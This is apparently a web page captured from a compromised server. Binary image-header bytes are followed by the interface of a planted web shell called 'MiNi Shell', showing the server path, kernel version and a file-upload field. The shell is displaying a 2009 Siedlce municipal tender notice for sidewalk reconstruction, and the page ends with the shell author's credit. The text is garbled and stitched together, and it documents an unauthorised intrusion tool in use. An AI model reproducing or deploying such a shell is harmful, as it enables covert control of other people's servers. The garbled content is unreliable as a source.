JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090306/52534-N-2009.html

<p class="kh_header"><b>Siedlce: Przebudowa chodników na ul. 3 Maja w Siedlcach (strona południowa).</b><br>
<b>Numer ogłoszenia: 52534 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Siedlce , Skwer Niepodległości 2, 08-110 Siedlce, woj. mazowieckie, tel. 025 6430785, faks 025 6430718.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siedlce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa chodników na ul. 3 Maja w Siedlcach (strona południowa)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia na: PRZEBUDOWĘ CHODNIKÓW  NA UL.  3 MAJA W  SIEDLCACH  (strona południowa).
ZAKRES ROBÓT OBEJMUJE:
1.	Wymianę krawężnika betonowego 20/30 na nowy z wykonaniem ławy betonowej z oporem.
 2. Wymianę obrzeży betonowych  na nowe     6/20 -  spoiny cementowe.
 3. Wymianę obrzeży betonowych  na nowe     8/25 -  spoiny cementowe.
 4.Wymianę istniejącej nawierzchni chodnika z płytek betonowych na kostkę betonową kolorową
     o grubości 6 cm na podsypce cementowo-piaskowej 1:4.
 5.Wymianę istniejącej nawierzchni na zjazdach do posesji z bloczków betonowych na kostkę     brukową o gr.  8 cm  na podsypce cementowo-piaskowej i  podbudowie betonowej B-7,5 
o gr. 10 cm. 
UWAGI:
1.	Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót.
2.	Zamawiający zaleca przeprowadzenie wizji w terenie.
3.	Wykonawca opracuje i przedstawi  do zatwierdzenia, uzgodniony z zarządcą  drogi  i  organem zarządzającym ruchem projekt tymczasowej organizacji ruchu  i zabezpieczenia robót w czasie trwania budowy. W zależności od potrzeb i postępu robót, projekt organizacji ruchu powinien być na bieżąco aktualizowany przez wykonawcę. Każda zmiana w stosunku do zatwierdzonego projektu organizacji ruchu wymaga każdorazowo ponownego zatwierdzenia projektu.

4.	Do obowiązków Wykonawcy należy:
 	-    organizacja ruchu i oznakowanie budowy,
-   ewentualny remont i naprawa uszkodzonej nawierzchni podczas prowadzenia robót na   przyległych ulicach i chodnikach,
-   odbiór robót po zgłoszeniu wykonanych prac,
  	-    odtworzenie przyległego terenu po zakończeniu robót do stanu pierwotnego,
  	-    wywóz materiałów rozbiórkowych,
	-    geodezyjna inwentaryzacja powykonawcza wykonanego chodnika..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium  w wysokości:  5 000,00 zł (pięć tysięcy złotych)
Wadium w formie pieniężnej wykonawca wpłaci przelewem na konto Urzędu Miasta PKO BP S.A. I O,Siedlce                  Nr 39 1020 4476 0000 8502 0022 3131, Urząd Miasta Siedlce Skwer  Niepodległości 2, z dopiskiem Wadium na: Przebudowa chodników na ul. 3 Maja w Siedlcach (strona południowa). Wniesienie wadium w pieniądzu będzie skuteczne jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.Wadium wnoszone                   w innej formie jak pieniądze wykonawca składa w oryginale w Referacie Księgowym Urzędu Miasta pokój Nr 5 w godzinach od 745 do  1545 . Nie należy załączać oryginału dokumentu wadialnego do oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności.
	 To jest: 
a)	Przedstawią aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed   upływem terminu składania ofert, 
b)	Przedstawią aktualne zaświadczenie właściwego naczelnik Urzędu Skarbowego  potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie  lub  rozłożenie na raty  zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu-wystawione nie wcześniej niż 3 miesiące przed upływem  terminu składania ofert,
c)	Przedstawią  aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń  Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające,   że wykonawca nie zalega z opłacaniem składek na ubezpieczenie  zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub  rozłożenie na raty  zaległych płatności lub wstrzymanie w  całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,

2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi                   do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. To jest:

a)	a) Dysponują osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej wraz z przynależnością do Izby Inżynierów Budownictwa,
b)	Wykonali roboty budowlane w okresie ostatnich pięciu lat przed dniem wszczęcia   postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. W szczególności zamawiający wymaga, aby wykonawca wykonał co najmniej trzy roboty                      o wartości nie mniejszej niż 200.000, 00 zł każda, polegające na remoncie, przebudowie lub wykonaniu nowego chodnika. Do wykazu należy dołączyć dokumenty stwierdzające jakość wykonanych robót np. referencje, protokóły odbioru   końcowego robót,
c)	Dysponują lub będą dysponowali niezbędnymi do wykonania zamówienia narzędziami i urządzeniami lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował,  tj :  koparka  kołowa podsiębierna - 1 szt.; samochód samowyładowczy - 1 szt.;  zagęszczarka wibracyjna -1 szt.

3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

a) Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę sumy ubezpieczenia   nie mniejszą niż  200 000, 00 zł  w dniu otwarcia ofert,
b) Przedstawią informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których posiadają rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową na kwotę 200.000, 00 zł, wystawioną nie wcześniej niż 3 m-ce przed upływem terminu składania ofert.

   4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia . 

Zamawiający oceni spełnienie warunków udziału w postępowaniu zgodnie z formułą spełnia, nie spełnia w oparciu o informacje zawarte w wymaganych w SIWZ dokumentach..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Na potwierdzenie spełniania warunków, o których mowa w pkt. 7 SIWZ do oferty należy dołączyć:

1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie  wcześniej niż  6 miesięcy przed upływem terminu składania ofert. 
2.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał    przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty  zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione  nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.
3.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że  wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne,  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie  lub  rozłożenie na raty  zaległych płatności lub wstrzymanie w całości wykonania decyzji  właściwego organu - wystawione nie wcześniej niż 3 miesiące przed  upływem  terminu składania ofert.
4.	Oświadczenie wykonawcy o spełnianiu warunków  udziału w postępowaniu - art. 22 i nie podleganiu wykluczeniu z postępowania na podstawie art. 24  ustawy Prawo zamówień publicznych.
5.	Polisę, a w przypadku jej  braku  inny dokument potwierdzający, że wykonawca jest  ubezpieczony                         od odpowiedzialności cywilnej w zakresie prowadzonej działalności  na kwotę sumy ubezpieczenia nie mniejszą niż   200.000, 00 zł, ważna  w dniu otwarcia ofert.
6.	Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejszą niż 200.000, 00 zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
7.	Uprawnienia budowlane osoby, która będzie uczestniczyć w wykonywaniu zamówienia, do kierowania robotami budowlanymi w specjalności drogowej wraz z przynależnością do Izby Inżynierów Budownictwa.
8.	Wykaz wykonanych robót budowlanych w w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością robotom   budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. W szczególności zamawiający wymaga, aby wykonawca wykonał co najmniej trzy roboty o wartości nie mniejszej niż 200.000 zł każda, polegające na remoncie, przebudowie lub wykonaniu nowego chodnika. Do wykazu należy dołączyć  dokumenty stwierdzające jakość wykonanych robót np. referencje, protokóły odbioru   końcowego robót.
9.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca  tj.: koparka kołowa podsiębierna - 1szt., samochód samowyładowczy - 1 szt., zagęszczarka wibracyjna - 1 szt.
10.	Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi               i urządzeń, jeżeli w wykazie, o którym mowa wyżej, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.

Dokumenty, o których mowa w powyżej należy złożyć w formie oryginału lub kopii poświadczonej za zgodność                  z oryginałem przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.siedlce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Referat Zamówień Publicznych Urzędu Miasta Siedlce, 08-110 Siedlce, Skwer Niepodległości 2, pok. nr 3, (cena: 29 zł brutto + koszt przesyłki)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 08:45, miejsce: Urząd Miasta Siedlce, Kancelaria Ogólna Urzędu Miasta Siedlce, Skwer  Niepodległości 2, 08-110 Siedlce, pokój Nr 30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com